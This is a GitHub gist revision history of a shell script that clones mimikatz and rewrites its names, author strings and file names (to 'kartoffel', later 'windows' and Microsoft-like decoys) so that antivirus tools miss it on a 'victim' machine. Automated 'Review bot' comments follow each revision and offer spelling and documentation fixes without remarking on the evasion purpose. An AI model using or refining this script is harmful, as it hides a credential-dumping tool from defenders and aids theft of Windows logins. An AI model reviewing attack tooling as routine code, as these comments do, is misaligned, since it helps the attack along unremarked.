@imaibou
Last active June 24, 2025 11:18

Revisions

  1. imaibou revised this gist Nov 8, 2016. 1 changed file with 3 additions and 4 deletions.
    7 changes: 3 additions & 4 deletions mimikatz_obfuscator.sh
    @@ -3,16 +3,15 @@
    # so removing them from the project before compiling gets us past most of the AV solutions.
    # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
    # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
    # The final binary's name will be windows.exe

    git clone https://github.com/gentilkiwi/mimikatz.git windows
    mv windows/mimikatz windows/windows
    find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/GATES/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Bill/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/[email protected]/billgates@hotmail.com/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/James/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Troy/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/[email protected]/jtroy@hotmail.com/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
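    Review bot: the replacement values in the `DELPY`, `Benjamin` and e-mail substitutions (`James`, `Troy`, `jtroy@hotmail.com`, next to `GATES`, `Bill`, `billgates@hotmail.com`) write a hotmail.com address and a personal name into every file under `windows/`, and that address may belong to a real third party. A reserved domain such as example.com, which the `kartoffel` version of the script uses in `johndoe@example.com`, keeps the rewritten strings from pointing at someone unconnected to the code.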
  2. imaibou revised this gist Nov 8, 2016. 1 changed file with 18 additions and 18 deletions.
    36 changes: 18 additions & 18 deletions mimikatz_obfuscator.sh
    @@ -3,26 +3,26 @@
    # so removing them from the project before compiling gets us past most of the AV solutions.
    # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
    # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
    # I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.
    # The final binary's name will be windows.exe

    git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
    mv kartoffel/mimikatz kartoffel/kartoffel
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/mimikatz/kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/KARTOFFEL/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/DELPY/DOE/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Benjamin/John/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/[email protected]/johndoe@example.com/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/hoyhayhay/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/KIWI/MANGO/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Mango/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/kiwi/mango/g'
    find kartoffel/ -type f -name '*mimikatz*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/mimikatz/kartoffel/g')";
    git clone https://github.com/gentilkiwi/mimikatz.git windows
    mv windows/mimikatz windows/windows
    find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/GATES/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Bill/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/[email protected]/billgates@hotmail.com/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Onedrive/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/kiwi/onedrive/g'
    find windows/ -type f -name '*mimikatz*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
    mv "${FILE}" "${newfile}";
    done
    find kartoffel/ -type f -name '*kiwi*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/kiwi/mango/g')";
    find windows/ -type f -name '*kiwi*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
    mv "${FILE}" "${newfile}";
    done
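    Review bot: the header comment in this hunk documents only the output name (`windows.exe`), while the `sed` lines also introduce `GATES`, `Bill`, `MSOffice`, `ONEDRIVE`, `Onedrive` and `onedrive` as replacement strings, and the two `while read FILE` loops rename every file matching `*mimikatz*` and `*kiwi*`. The comment should list each substitution pair, so that anyone analysing a build made from this revision can map the rewritten strings and file names back to the upstream ones.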
  3. imaibou revised this gist Nov 8, 2016. No changes.
  4. imaibou revised this gist Nov 8, 2016. 1 changed file with 6 additions and 1 deletion.
    7 changes: 6 additions & 1 deletion mimikatz_obfuscator.sh
    @@ -1,4 +1,9 @@
    # This script downloads and slightly "obfuscates" the mimikatz project. Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., so removing them from the project before compiling gets us past most of the AV solutions. We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.
    # This script downloads and slightly "obfuscates" the mimikatz project.
    # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
    # so removing them from the project before compiling gets us past most of the AV solutions.
    # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
    # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
    # I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.

    git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
    mv kartoffel/mimikatz kartoffel/kartoffel
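    Review bot: the last comment line carried over by this reflow still has three spelling errors, "germain", "recommand" and "flaged", which should read "German", "recommend" and "flagged". Since the hunk only re-wraps the comment, this is the place to correct them; the trailing "...," and "....," after the keyword lists could also be normalised to a single ellipsis.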
  5. imaibou created this gist Nov 8, 2016.
    23 changes: 23 additions & 0 deletions mimikatz_obfuscator.sh
    @@ -0,0 +1,23 @@
    # This script downloads and slightly "obfuscates" the mimikatz project. Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., so removing them from the project before compiling gets us past most of the AV solutions. We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.

    git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
    mv kartoffel/mimikatz kartoffel/kartoffel
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/mimikatz/kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/KARTOFFEL/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/DELPY/DOE/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Benjamin/John/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/[email protected]/[email protected]/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/hoyhayhay/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/KIWI/MANGO/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Mango/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/kiwi/mango/g'
    find kartoffel/ -type f -name '*mimikatz*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/mimikatz/kartoffel/g')";
    mv "${FILE}" "${newfile}";
    done
    find kartoffel/ -type f -name '*kiwi*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/kiwi/mango/g')";
    mv "${FILE}" "${newfile}";
    done
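    Review bot: the opening comment claims the result "gets us past most of the AV solutions", but the substitutions below it cover only project and author names (`mimikatz`, `gentilkiwi`, `kiwi`, `DELPY`, `Benjamin`, the e-mail address, `creativecommons`), and the same comment states that the command keywords "sekurlsa", "logonpasswords", "lsadump", "minidump" and "pth" are left unchanged. The comment should be narrowed to say the script addresses signatures on those name strings only; nothing in this file affects detection keyed on the remaining keywords or on what the binary does at run time.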